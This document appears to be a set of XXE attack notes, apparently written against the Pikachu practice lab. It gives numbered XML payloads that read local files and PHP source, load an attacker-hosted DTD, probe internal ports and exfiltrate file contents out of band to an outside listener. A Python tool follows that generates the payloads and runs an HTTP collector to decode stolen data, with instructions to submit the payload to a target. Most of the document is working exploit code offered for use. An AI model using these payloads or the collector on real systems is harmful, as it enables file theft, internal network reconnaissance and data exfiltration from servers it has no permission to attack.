1. PoC: attack test (internal entity; if the response echoes the value, the parser expands DTD entities)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "password">]>
<foo>&xxe;</foo>
2. EXP: read a local file
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<foo>&xxe;</foo>
3. EXP: read source code (php://filter base64-encodes the file so `<?php` and other markup in the source does not break the XML when the entity is substituted)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=D:/phpStudy_pro/WWW/pikachu/vul/rce/rce.php"> ]>
<foo>&xxe;</foo>
4. EXP: external DTD call (parameter entity loaded from an attacker-hosted DTD)
1.DTD (hosted at http://127.0.0.1:80/1.DTD; contents:)
<!ENTITY evil SYSTEM "file:///C:/windows/win.ini">
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://127.0.0.1:80/1.DTD" >
%xxe;
]>
<foo>&evil;</foo>
5. EXP: probe live hosts and open ports on the internal network (timing/error differences reveal whether the port is open)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY>
<!ENTITY rabbit SYSTEM "http://127.0.0.1:80">]>
<x>&rabbit;</x>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY>
<!ENTITY rabbit SYSTEM "mysql://127.0.0.1:3306">]>
<x>&rabbit;</x>
Pointing the entity at port 81, the request spins for a few seconds before returning, which indicates that port is not open.
6. EXP: blind (no-echo) exfiltration via out-of-band request
2.DTD (hosted at http://127.0.0.1/2.DTD; contents:)
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://192.168.233.132:8844/?%file;'>">
%start;
1.txt (the target file on the victim; contents:) 123456789ws
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://127.0.0.1/2.DTD">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">
%remote;
%send;]>
Kali: listen on the port (8844 above) to receive the callback; the query string of the incoming request carries the base64-encoded file content.
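The listener side of step 6, as an added example that is not part of the original notes: a small HTTP receiver that decodes the base64 query the victim's parser sends when `%send;` expands, plus a helper that emits the two-part payload (external DTD and XML document) in the same layout as above. The DTD URL, collector address and target path are parameters; `demo()` simulates the victim parser's callback with a local HTTP client so it runs offline, and the sample file body `123456789ws` is the page's own 1.txt listing.

```python
"""Out-of-band XXE collector and payload builder (added example, stdlib only).
Assumed names: build_exfil_payload, decode_exfil_query, start_receiver, demo."""
import base64
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_exfil_payload(dtd_url: str, collector_host: str, collector_port: int,
                        target_path: str):
    """Return (external_dtd, xml_document) in the layout used in section 6.

    external_dtd is what you host at dtd_url; xml_document is what you send to
    the vulnerable endpoint. php://filter base64-encodes the file so newlines,
    '<' and '&' in the file cannot break the URL or the XML.
    """
    collector = f"http://{collector_host}:{collector_port}/?%file;"
    external_dtd = (
        f"<!ENTITY % start \"<!ENTITY % send SYSTEM '{collector}'>\">\n"
        "%start;\n"
    )
    xml_document = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE message [\n"
        f'<!ENTITY % remote SYSTEM "{dtd_url}">\n'
        '<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/'
        f'resource=file:///{target_path}">\n'
        "%remote;\n"
        "%send;]>\n"
        "<message>x</message>\n"
    )
    return external_dtd, xml_document


def decode_exfil_query(path: str) -> bytes:
    """Recover the file bytes from a request path of the form '/?<base64>'.

    unquote (not unquote_plus) is used on purpose: '+' is a base64 digit and
    must survive, while a parser that percent-encodes '=' padding is undone.
    """
    query = urllib.parse.unquote(urllib.parse.urlsplit(path).query)
    return base64.b64decode(query, validate=True)


class ExfilHandler(BaseHTTPRequestHandler):
    """Stores every decoded callback on the server object; always answers 200."""

    def do_GET(self):
        try:
            self.server.received.append(decode_exfil_query(self.path))
        except ValueError:  # binascii.Error is a ValueError: not base64
            self.server.received.append(None)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


class ExfilServer(HTTPServer):
    def __init__(self, address):
        super().__init__(address, ExfilHandler)
        self.received = []


def start_receiver(host: str = "127.0.0.1", port: int = 0) -> ExfilServer:
    """Start the collector in a background thread; port 0 picks a free port.
    Use port=8844 to match the payload on the page."""
    server = ExfilServer((host, port))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def demo() -> bytes:
    """Simulate the victim parser's callback against a local receiver.

    Constructed input: the base64 that php://filter would emit for a 1.txt
    containing '123456789ws'. Returns the bytes the collector decoded.
    """
    server = start_receiver()
    host, port = server.server_address
    encoded = base64.b64encode(b"123456789ws").decode()
    # When %send; expands, the parser issues exactly this GET.
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", f"/?{encoded}")
    conn.getresponse().read()
    conn.close()
    server.shutdown()
    server.server_close()
    return server.received[0]


if __name__ == "__main__":
    dtd, doc = build_exfil_payload("http://127.0.0.1/2.DTD",
                                   "192.168.233.132", 8844, "c:/1.txt")
    print(dtd)
    print(doc)
    print(demo())
```

Run it with `start_receiver(port=8844)` on the Kali box (keep the process alive) and submit the generated `xml_document` to the target; each decoded file lands in `server.received`. Bear in mind that the base64 must fit in a URL, so very large files are truncated or rejected by the victim's parser.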